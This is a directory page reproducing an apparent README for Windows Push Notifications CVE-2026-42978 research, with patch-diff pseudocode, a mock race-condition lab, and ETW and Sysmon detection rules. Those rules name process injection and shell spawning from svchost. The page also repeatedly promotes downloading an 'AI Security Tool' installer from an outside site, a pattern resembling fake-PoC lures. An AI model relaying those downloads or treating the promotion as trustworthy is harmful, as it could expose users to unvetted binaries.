Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/syntaxmethod/cve-2026-42978-poc-research
Defensive ToolsPrivilege EscalationVulnerability ScannersVulnerability AnalysisExploitationThreat IntelligencePapers & ResearchLearning & Education

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
syntaxmethod/cve-2026-42978-poc-research

CVE-2026-42978-PoC-Research

CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free 및 경쟁 조건 PoC 연구, 진단 스캐너, AI Security Tool용 보안 감사 모듈.

저장소 보기웹사이트
1317시간 25분 전아직 검토되지 않음

CVE-2026-42978
AI 보안 도구용 Windows 푸시 알림 모듈

차세대 AI 보안 에코시스템, 멀티 프로토콜 터미널 및 자율 에이전트 제품군


Latest Release Build Status Donations Telegram Channel License

웹사이트 · 제품 문서 · 호스트 애플리케이션 · 커뮤니티 채팅

웹사이트 내비게이션: 홈 · 업데이트 · 다운로드 · 모듈

Module banner


공식 호스트 애플리케이션

제품: AI Security Tool
사이트: zerodayevil.github.io
문서: https://zerodayevil.github.io/ai-security-tool

이 모듈은 AI Security Tool을 위한 검토된 분석 문서이자 안전 점검 프로필입니다.
프로젝트 사이트나 공식 카탈로그에 등록된 모듈만 사용하십시오. 이 모듈은 승인된 애플리케이션 내부에서, 본인이 소유하거나 서면으로 평가 권한을 부여받은 엔드포인트를 대상으로만 로드하십시오.

이 저장소는 WpnService에 대한 무기화된 익스플로잇을 제공하지 않습니다. lab/ 아래의 실습 환경은 해당 부류의 버그(TOCTOU / 이중 페치)를 모사한 독립 실행형 목업입니다. 실제 푸시 알림 서비스와는 통신하지 않습니다.


빠른 시작 및 설치

먼저 호스트 애플리케이션을 설치하십시오. 그런 다음 Modules → Windows / Local EoP → CVE-2026-42978에서 이 모듈을 활성화하십시오.

바로 사용 가능한 빌드

공식 출처만 사용하십시오:

  • https://zerodayevil.github.io/
  • https://zerodayevil.github.io/ai-security-tool
  • https://github.com/ZeroDayEvil/ai-security-tool

개념 개요

CVE-2026-42978은 Windows 푸시 알림의 로컬 권한 상승 취약점입니다. Microsoft는 적절한 동기화 없이 공유 리소스에 동시 접근하는 문제(CWE-362)로 설명합니다. 패치된 wpncore.dll과 패치되지 않은 버전에 대한 연구는 플랫폼 종료 중 PresentationEndpointFacade에서 발생하는 use-after-free 경쟁 조건을 보여줍니다.

WpnService는 세션 0에서 NT AUTHORITY\SYSTEM(svchost.exe -k netsvcs -p)으로 실행됩니다. 토스트, 타일, 배지 전달이 이 서비스를 통해 이루어집니다. 이 프로세스를 상대로 경쟁 조건에서 승리하면 로컬 머신에서 SYSTEM 권한 문제가 됩니다 — 원격 사전 인증 DC 버그가 아닙니다.

상태: 2026년 6월 10일(패치 화요일)에 패치되었습니다. 이 페이지는 방어적 연구입니다.

이것은 CVE-2026-41089(Netlogon RCE)가 아닙니다. 구성 요소, 권한 모델, 패치 날짜가 모두 다릅니다.


사양


적용 범위

푸시 알림을 포함하는 클라이언트 및 서버 SKU. 티켓을 종료하기 전에 MSRC에서 정확한 KB를 확인하십시오.

제품군비고
Windows 101809, 21H2, 22H2 (해당되는 경우 x86 / x64 / ARM64)
Windows 1123H2, 24H2, 25H2, 26H1
Windows Server2016 / 2019 / 2022 / 2025 (구성 요소가 존재하는 경우 전체 및 Server Core)

공개 서비스 공지 기반 참고 빌드 (항상 MSRC를 다시 확인하십시오):


근본 원인 (연구)

이 파사드는 알림 API 호출을 감싸고 PresentationEndpointImpl에 위임합니다. 플랫폼 종료 중에 NotificationPlatform 객체가 파괴됩니다. 여러 파사드 메서드는 역사적으로 종료 플래그나 공유 잠금 없이 플랫폼 포인터를 가져왔습니다. 해제가 경쟁에서 이기면 다음 호출은 댕글링 포인터를 사용합니다.

Facade, platform, shutdown guard

동일한 잠금 및 가드 패턴이 49개의 PresentationEndpointFacade::* 메서드에 적용되었습니다. 그 아래의 구현 메서드는 그대로 남겨졌습니다 — 구멍은 파사드에 있었습니다.

패치되지 않은 형태 (wpncore.dll 26100.8521)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — unpatched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    NotificationPlatformHandle::Get(this + 0x50);
    if (platform == NULL)
        Throw_Hr(...);
    return PresentationEndpointImpl::UnblockToastsForEachApp(...);
}

패치된 형태 (wpncore.dll 26100.8655)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — patched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    if (Feature_4097557817::IsEnabled()) {
        AcquireSRWLockShared(&Wns::s_platformLock);
        if (Wns::s_platformShutdown)
            Throw_Hr(E_APPLICATION_EXITING);
        NotificationPlatformHandle::Get(this + 0x50);
        ReleaseSRWLockShared(&Wns::s_platformLock);
    }
}

Ghidra with unpatched and patched wpncore.dll open

패치가 추가하는 것:

  1. AcquireSRWLockShared — 리더-라이터 잠금; 종료는 배타적 잠금을 획득합니다.
  2. s_platformShutdown — 해제가 시작되면 E_APPLICATION_EXITING으로 빠져나갑니다.
  3. WIL unique_storage를 통한 RAII 해제로, 예외 경로에서도 잠금이 해제됩니다.
  4. 단계적 배포 / 롤백을 위한 기능 플래그 Feature_4097557817.

바이너리 차이의 규모

reports/의 PE 참고 사항:

  • .text가 18,432 바이트 증가
  • .data가 96 바이트 증가 (Wns::s_platformLock, Wns::s_platformShutdown)
  • 새로운 임포트 없음 — SRW 잠금 API는 이미 존재했습니다
  • 배타적 잠금 해제를 위한 새로운 RAII 소멸자

영향

WpnService는 SYSTEM입니다. 경쟁 조건에서 승리하면 댕글링 vtable 호출이 로컬 SYSTEM 코드 실행으로 이어질 수 있습니다. 그 단계 — 힙 스프레이, vtable 하이재킹, 페이로드 — 는 여기서 범위 밖입니다.

이 모듈은 근본 원인 이해, 패치 검증, 탐지를 위한 것입니다.


AI Security Tool 내에서 이 모듈 사용하기

  1. zerodayevil.github.io에서 최신 공식 빌드를 설치하십시오.
  2. Modules → CVE-2026-42978을 여십시오.
  3. 점검 대상을 권한이 부여된 Windows 엔드포인트로 지정하십시오.
  4. 결과를 "경쟁 조건 발동"이 아니라 패치 존재 여부 / WPN 상태로 취급하십시오.
  5. 선택적으로 탐지 팩(detection/)을 실습 장비에 수집하십시오.

프로덕션 WpnService에 대해 크래시나 경쟁 루프를 실행하지 마십시오.

root@kitploit:~
authorized operator
        │
        ▼
 AI Security Tool  →  module 42978
        │
        ▼
 authorized Windows endpoint
        │
        ├─ patch / wpncore.dll age
        └─ SIEM / Sysmon / Event Log notes

TOCTOU 실습 환경 (목업 서비스 전용)

lab/은 이중 페치 / TOCTOU의 독립 실행형 C 데모입니다. 명명된 파이프와 공유 메모리를 사용합니다. wpncore.dll을 로드하지 않으며 WpnService를 시작하거나 중지하지도 않습니다.

  • vulnerable_service.exe — 길이를 검증하고, 대기한 후, 길이를 다시 읽습니다.
  • race_attacker.exe — 그 창 동안 공유 값을 뒤집습니다.
  • --patched — 로컬 변수로 단일 페치; 동일한 공격자가 경쟁 조건을 전혀 보지 못해야 합니다.

GCC(MinGW)가 필요합니다. lab/에서:

root@kitploit:~
build.bat

터미널 1: vulnerable_service.exe
터미널 2: race_attacker.exe 5
그런 다음 vulnerable_service.exe --patched와 비교하십시오.

TOCTOU race condition demo


탐지 및 위협 헌팅

ETW 모니터 — detection/etw_wpn_monitor.ps1

일곱 가지 점검:

  1. WpnService 상태 및 PID
  2. 크래시 / 재시작 이력
  3. Push Notifications Platform 이벤트 로그 폭주
  4. WPN 관련 명명된 파이프
  5. 패치 힌트 (wpncore.dll 날짜 / 빌드)
  6. WPN 모듈이 로드된 프로세스
  7. 알림 데이터 경로 아래의 정션 / 심볼릭 링크 감사
root@kitploit:~
powershell -ExecutionPolicy Bypass .\detection\etw_wpn_monitor.ps1

ETW monitor output

Sysmon — detection/sysmon_wpn_race_detect.xml

root@kitploit:~
sysmon64.exe -accepteula -i detection\sysmon_wpn_race_detect.xml

이벤트 뷰어

채널: Microsoft-Windows-PushNotifications-Platform/Operational

  • 이벤트 1225 — 전송 계층 WPN 명령
  • 폭주 비율 (예: 분당 >20) — 살펴볼 가치가 있으나 유죄 판결은 아님
  • 오류 / 심각 — 실패한 시도로 인한 크래시 가능성

Event Viewer WPN operational log


완화 체크리스트

  • 범위 내 모든 SKU에 2026년 6월 누적 업데이트 적용
  • wpncore.dll 빌드가 해당 브랜치의 패치된 행과 일치
  • DC뿐 아니라 워크스테이션과 점프 박스에도 EDR / Sysmon 적용
  • svchost -k netsvcs가 셸을 생성할 때 경고
  • 핫픽스 인벤토리와 함께 호스트 앱 모듈 결과 보관

etw_wpn_monitor.ps1이 패치되지 않았다고 보고하면 — 2026년 6월 업데이트를 설치하고 다시 점검하십시오.


관련 CVE (2026년 6월 WPN 클러스터)


저장소 구조

root@kitploit:~
CVE-2026-42978/
├── README.md
├── LICENSE
├── lab/
│   ├── vulnerable_service.c
│   ├── race_attacker.c
│   └── build.bat
├── detection/
│   ├── etw_wpn_monitor.ps1
│   └── sysmon_wpn_race_detect.xml
└── reports/
    ├── PE_DIFF_REPORT.txt
    └── FUNCTION_DIFF_REPORT.txt

요구 사항: 탐지 스크립트용 Windows 10/11 · 목업 실습 환경용 MinGW · Sysmon 선택 사항.

이 README의 스크린샷은 공개 이미지 URL에서 로드됩니다. 이 트리에는 저장되어 있지 않습니다.


참고 자료

  • MSRC — CVE-2026-42978
  • CVE 레코드
  • BDU:2026-08249

보안 모듈 카탈로그

원격 코드 실행 및 네트워크 문제 4 modules
  • CVE-2026-41089 — Windows Netlogon 모듈 · @ZeroDayEvil
  • CVE-2026-20805 — Windows RCE 모듈 · @ZeroDayEvil
  • CVE-2026-41096 — 중요 RCE 점검 모듈 · @ZeroDayEvil
  • CVE-2026-24291 — 네트워크 프로토콜 모듈 · @ZeroDayVPN
권한 상승 및 서비스 2 modules
  • CVE-2026-66804 — CrossDevice 서비스 EoP · @ZeroDayVPN
  • CVE-2026-42978 — Windows 푸시 알림 EoP (이 저장소) · @ZeroDayEvil
연구 및 분석 문서 2 modules
  • CVE-2026-50416 — 로컬 권한 상승 분석 문서 · @ZeroDayEvil
  • CVE-2026-83991 — 분석 문서 모듈 · @ZeroDayVPN

기여 및 커뮤니티

유용한 작업:

  1. 사실 — MSRC 빌드, 6월 WPN 클러스터의 형제 CVE.
  2. 탐지 — Sigma, 더 나은 ETW, ASR 권장 사항.
  3. 호스트 앱 메타데이터 및 번역.
  4. 문서 및 깨진 링크 수정.

무기화된 WpnService 익스플로잇, 힙 스프레이 도우미, 또는 실제 서비스에 대한 익스플로잇 PoC를 추가하는 PR은 열지 마십시오.


연락처 및 지원

  • 웹사이트: zerodayevil.github.io
  • 제품 문서: zerodayevil.github.io/ai-security-tool
  • Telegram 관리자: @ZeroDayEvil
  • Telegram 채팅: @ZeroDyaTool_chat
  • Telegram 채널: @ZeroDyaTool_channel
  • Open Collective: opencollective.com/ZeroDayEvil

라이선스 및 법적 고지

MIT 라이선스로 배포됩니다. LICENSE를 참조하십시오.

승인된 방어적 연구 및 시스템 관리 전용입니다.
서면 승인 없는 로컬 권한 상승 테스트는 불법입니다.

이 취약점은 패치되었습니다. Windows를 최신 상태로 유지하십시오. 이 저장소에는 실제 서비스에 대한 무기화된 익스플로잇이 포함되어 있지 않습니다.


AI Security Tool — 사이버보안 전문가를 위한 터미널 워크플로 및 자동화.

zerodayevil.github.io용 방어 모듈 · 독립 실행형 WpnService 익스플로잇 없음 · MSRC에서 사실 확인

도구 다운로드
OS / 플랫폼버전아키텍처 / 형식업데이트상태다운로드
Windowsv6.3.20x64 설치 프로그램 (.exe)2026-09-08최신Download .exe
Windowsv6.3.20x64 포터블 (.tar.gz)2026-09-08최신Download .tar.gz
macOSv5.3.29Apple Silicon (.dmg)2026-09-05안정Download .dmg
Linuxv5.3.27범용 x64 (.tar.gz)2026-09-01안정Download .tar.gz
Androidv5.3.27ARM64 APK (.apk)2026-09-01안정Download .apk
필드값
CVECVE-2026-42978
BDUBDU:2026-08249
벤더 권고MSRC — Windows Push Notifications EoP
심각도높음 · CVSS 3.1 7.8
취약점 유형CWE-362 경쟁 조건 · 종료 경로에서의 use-after-free
구성 요소Windows Push Notifications · WpnService · wpncore.dll
공격 벡터로컬
필요 권한낮음 (권한이 부여된 로컬 사용자)
사용자 상호작용없음
패치 화요일2026년 6월 10일
모듈 유형연구 분석 문서 + 앱 내 안전 점검 + 탐지 팩
브랜치참고 패치 빌드
Windows 11 23H222631.7219
Windows 11 24H226100.8655
Windows 11 25H226200.8655
Windows 11 26H128000.2269
wpncore.dll 예시 (24H2)취약 26100.8521 → 패치 26100.8655
범주예시 함수
ToastToastUnblockAll, ToastCreateSession, ToastCloseSession, ToastRequestAllNotifications, ToastSuppress
TileTileCreateSession, TileCloseSession, TileRequestResourceForeground
등록RegisterApplication, UnregisterApplication, RegisterHandler, UpdateRegistration
설정ChangeAppSetting, QueryAppSetting, QueryGlobalSetting
전달Deliver, GetPayloadForNotificationId, Submit, PostScheduledNotification
쿼리GetRegisteredHandler, GetSettingsFromHandler, GetAssetsFromHandler
규칙용도
WPN_EoP_ChildProcesssvchost (netsvcs)가 cmd / powershell / wscript를 생성
WPN_PipeAccessWPN 관련 명명된 파이프 연결
WPN_FileCreation알림 데이터 디렉터리 아래의 파일 생성
WPN_RegistryTamperingPushNotifications 키 아래의 쓰기
WPN_ProcessAccesssvchost에 대한 PROCESS_ALL_ACCESS
WPN_ThreadInjectionsvchost로의 CreateRemoteThread
CVE분류
CVE-2026-42977EoP · 경쟁 조건
CVE-2026-42978EoP · 경쟁 조건 (이 모듈)
CVE-2026-42979EoP · 경쟁 조건
CVE-2026-42991EoP · 경쟁 조건
CVE-2026-42969정보 노출 · 경쟁 조건
CVE-2026-42970정보 노출 · 경쟁 조건
CVE-2026-42973정보 노출 · 경쟁 조건
CVE-2026-26167EoP
CVE-2026-32160EoP